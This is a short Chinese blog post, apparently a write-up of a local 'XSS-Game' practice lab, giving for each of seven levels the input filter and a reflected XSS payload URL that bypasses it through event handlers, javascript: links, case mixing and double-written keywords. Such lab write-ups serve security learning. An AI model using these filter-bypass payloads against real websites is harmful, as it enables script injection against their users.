其他分享
首页 > 其他分享> > XSS-Game

XSS-Game

作者:互联网

  1. 很简单的弹窗

    http://192.168.31.177/xssgame/level1.php?name=<script>alert(1)</script>

  2. 过滤了><

    http://192.168.31.177/xssgame/level2.php?keyword=" oninput='alert(1)'//&submit=‘搜索’

  3. 过滤了><'

    用单引号替换了双引号

    http://192.168.31.177/xssgame/level3.php?keyword=' oninput=alert(1) //&submit=搜索

  4. 过滤了><"

    http://192.168.31.177/xssgame/level4.php?keyword=" onm ouseover=alert(1)//&submit=搜索

  5. script替换成scr_ipton事件替换成了on_事件

    利用伪协议 <a href='javascript:alert(1)'>来执行弹框

    http://192.168.31.177/xssgame/level5.php?keyword="><a href='javascript:alert(1)'> //&submit=搜索

  6. script替换成scr_ipton事件替换成了on_事件href替换成了hr_ef

    大小写绕过

    http://192.168.31.177/xssgame/level6.php?keyword="<sCRipt>alert(1)</script>//&submit=搜索

  7. scriptonhref直接替换为空

    双写绕过

    http://192.168.31.177/xssgame/level7.php?keyword=1" oonnmouseover=alert(1)>//&submit=搜索

  8. script替换成了scr_ipton事件替换成了on_事件href替换成了hr_ef

标签:XSS,xssgame,http,192.168,Game,替换成,31.177,php
来源: https://www.cnblogs.com/yuxingjiu/p/16484320.html